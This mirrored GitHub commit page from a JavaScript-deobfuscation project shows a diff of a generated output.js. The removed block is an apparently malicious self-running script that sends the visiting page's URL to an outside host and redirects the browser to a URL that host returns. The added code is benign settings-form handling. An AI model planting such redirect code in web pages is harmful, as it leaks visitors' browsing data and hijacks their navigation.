mirror of
https://github.com/smallfawn/decode_action.git
synced 2025-12-20 00:35:19 +08:00
Add decoded output file
This commit is contained in:
51
output.js
51
output.js
@@ -1,21 +1,36 @@
|
||||
//Fri Apr 18 2025 06:59:06 GMT+0000 (Coordinated Universal Time)
|
||||
//Fri Apr 18 2025 08:09:25 GMT+0000 (Coordinated Universal Time)
|
||||
//Base:<url id="cv1cref6o68qmpt26ol0" type="url" status="parsed" title="GitHub - echo094/decode-js: JS混淆代码的AST分析工具 AST analysis tool for obfuscated JS code" wc="2165">https://github.com/echo094/decode-js</url>
|
||||
//Modify:<url id="cv1cref6o68qmpt26olg" type="url" status="parsed" title="GitHub - smallfawn/decode_action: 世界上本来不存在加密,加密的人多了,也便成就了解密" wc="741">https://github.com/smallfawn/decode_action</url>
|
||||
!function () {
|
||||
var _0x4bfbca = new XMLHttpRequest(),
|
||||
_0x51ae6e = {
|
||||
"link": window.location.href,
|
||||
"path": window.location.href.replace(window.location.origin, "")
|
||||
},
|
||||
_0x5d1321 = "https://www.baidu.com/";
|
||||
_0x4bfbca.open("POST", "https://ff.up.gnzrmyy.cn/api/url/info");
|
||||
_0x4bfbca.setRequestHeader("Content-Type", "application/json");
|
||||
_0x4bfbca.send(JSON.stringify(_0x51ae6e));
|
||||
_0x4bfbca.onreadystatechange = function () {
|
||||
if (4 === _0x4bfbca.readyState && 200 === _0x4bfbca.status) {
|
||||
var _0x2c013e = JSON.parse(_0x4bfbca.response);
|
||||
if (0 === _0x2c013e.code) return window.location.href = _0x2c013e.data.url, undefined;
|
||||
function text() {
|
||||
layer.msg("正在提交", {
|
||||
"time": 5000000
|
||||
});
|
||||
$.ajax({
|
||||
"type": "POST",
|
||||
"data": $("#configform").serialize(),
|
||||
"url": "index.php?act=setting",
|
||||
"success": function (_0x17e5d2) {
|
||||
layer.msg("保存完成", {
|
||||
"time": 1000
|
||||
});
|
||||
}
|
||||
window.location.href = _0x5d1321;
|
||||
};
|
||||
}();
|
||||
});
|
||||
}
|
||||
function reset1() {
|
||||
layer.confirm("确定要还原设置吗?", {
|
||||
"title": "提示"
|
||||
}, function () {
|
||||
{
|
||||
$.ajax({
|
||||
"type": "POST",
|
||||
"data": $("#configform").serialize(),
|
||||
"url": "index.php?act=reset",
|
||||
"success": function (_0x414a35) {
|
||||
layer.msg("还原完成", {
|
||||
"time": 1000
|
||||
});
|
||||
}
|
||||
});
|
||||
}
|
||||
});
|
||||
}
|
||||
Reference in New Issue
Block a user